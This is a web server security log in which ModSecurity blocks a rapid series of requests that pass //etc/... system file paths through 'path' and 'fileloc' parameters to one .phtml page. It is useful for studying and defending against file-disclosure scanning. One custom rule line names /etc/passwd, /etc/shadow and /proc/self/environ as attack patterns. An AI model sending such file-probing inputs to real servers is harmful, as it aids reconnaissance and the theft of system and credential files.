[Thu Mar 19 13:23:25.584109 2026] [:error] [pid 17653:tid 140411641214720] [client 57.141.18.113:50910] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_Mdf6f5d65gmYZSMZQAAAsw"]
[Thu Mar 19 13:23:25.792554 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.58:50928] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_fu8EFLIOrSqIpu7mAAAAlE"]
[Thu Mar 19 13:23:25.922360 2026] [:error] [pid 14269:tid 140411632822016] [client 57.141.18.48:50932] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_QbLMZ6AikZjR9VwqwAAAA0"]
[Thu Mar 19 13:23:26.059141 2026] [:error] [pid 19093:tid 140411616036608] [client 57.141.18.96:50938] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_l_V7PWP6ixUYl7P4wAAAo8"]
[Thu Mar 19 13:23:27.954634 2026] [:error] [pid 17653:tid 140411725141760] [client 57.141.18.53:50946] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_sdf6f5d65gmYZSMaAAAAsI"]
[Thu Mar 19 13:23:27.954860 2026] [:error] [pid 30077:tid 140411666392832] [client 57.141.18.99:50950] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_vu8EFLIOrSqIpu7mQAAAkk"]
[Thu Mar 19 13:23:27.956171 2026] [:error] [pid 30077:tid 140411632822016] [client 57.141.18.28:50964] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi__u8EFLIOrSqIpu7nAAAAk0"]
[Thu Mar 19 13:23:27.956251 2026] [:error] [pid 19093:tid 140411557287680] [client 57.141.18.98:50952] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_1_V7PWP6ixUYl7P5QAAApY"]
[Thu Mar 19 13:23:27.959199 2026] [:error] [pid 30077:tid 140411658000128] [client 57.141.18.52:50960] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi__u8EFLIOrSqIpu7mwAAAko"]
[Thu Mar 19 13:23:28.074636 2026] [:error] [pid 19093:tid 140411725141760] [client 57.141.18.123:50976] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAF_V7PWP6ixUYl7P6AAAAoI"]
[Thu Mar 19 13:23:28.376173 2026] [:error] [pid 19093:tid 140411691570944] [client 57.141.18.3:50980] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAF_V7PWP6ixUYl7P6QAAAoY"]
[Thu Mar 19 13:23:28.576636 2026] [:error] [pid 14269:tid 140411699963648] [client 57.141.18.59:50986] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAAbLMZ6AikZjR9VwrgAAAAU"]
[Thu Mar 19 13:23:28.959002 2026] [:error] [pid 31803:tid 140411616036608] [client 57.141.18.48:50992] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAOyqAr6etmhZHNpzBgAAAE8"]
[Thu Mar 19 13:23:29.611544 2026] [:error] [pid 27403:tid 140411590858496] [client 57.141.18.51:51012] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjARkFeYa1D6dYQnAEWAAAAdI"]
[Thu Mar 19 13:23:30.107786 2026] [:error] [pid 30077:tid 140411590858496] [client 57.141.18.104:51020] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAvu8EFLIOrSqIpu7nQAAAlI"]
[Thu Mar 19 13:23:30.576901 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.64:51030] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAuoXxyEfFpUF8f8gFAAAAUI"]
[Thu Mar 19 13:23:30.823227 2026] [:error] [pid 14269:tid 140411658000128] [client 57.141.18.117:51034] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAgbLMZ6AikZjR9VwrwAAAAo"]
[Thu Mar 19 13:23:31.139809 2026] [:error] [pid 27403:tid 140411674785536] [client 57.141.18.12:51024] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAxkFeYa1D6dYQnAEWgAAAcg"]
[Thu Mar 19 13:23:31.208083 2026] [:error] [pid 27403:tid 140411557287680] [client 57.141.18.46:51050] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjAxkFeYa1D6dYQnAEWwAAAdY"]
[Thu Mar 19 13:23:33.096233 2026] [:error] [pid 17653:tid 140411565680384] [client 57.141.18.61:51056] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjA8df6f5d65gmYZSMaQAAAtU"]
[Thu Mar 19 13:23:33.100943 2026] [:error] [pid 31803:tid 140411691570944] [client 57.141.18.124:51070] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBOyqAr6etmhZHNpzCAAAAEY"]
[Thu Mar 19 13:23:33.101310 2026] [:error] [pid 27293:tid 140411540502272] [client 57.141.18.16:51072] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBf-YZRR_7pZ7nDKezgAAA9g"]
[Thu Mar 19 13:23:33.102218 2026] [:error] [pid 27403:tid 140411741927168] [client 57.141.18.53:51066] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBBkFeYa1D6dYQnAEXwAAAcA"]
[Thu Mar 19 13:23:33.122813 2026] [:error] [pid 27403:tid 140411582465792] [client 57.141.18.97:51068] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBBkFeYa1D6dYQnAEYAAAAdM"]
[Thu Mar 19 13:23:33.443650 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.122:51082] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBda6ubjKNq_cu4Zp6AAAA0Q"]
[Thu Mar 19 13:23:33.567506 2026] [:error] [pid 27403:tid 140411632822016] [client 57.141.18.53:51088] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBRkFeYa1D6dYQnAEYQAAAc0"]
[Thu Mar 19 13:23:34.002879 2026] [:error] [pid 31803:tid 140411540502272] [client 57.141.18.53:51098] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBuyqAr6etmhZHNpzCQAAAFg"]
[Thu Mar 19 13:23:34.760045 2026] [:error] [pid 14269:tid 140411574073088] [client 57.141.18.101:51106] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBgbLMZ6AikZjR9VwsAAAABQ"]
[Thu Mar 19 13:23:34.854289 2026] [:error] [pid 30077:tid 140411582465792] [client 57.141.18.8:51110] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjBvu8EFLIOrSqIpu7nwAAAlM"]
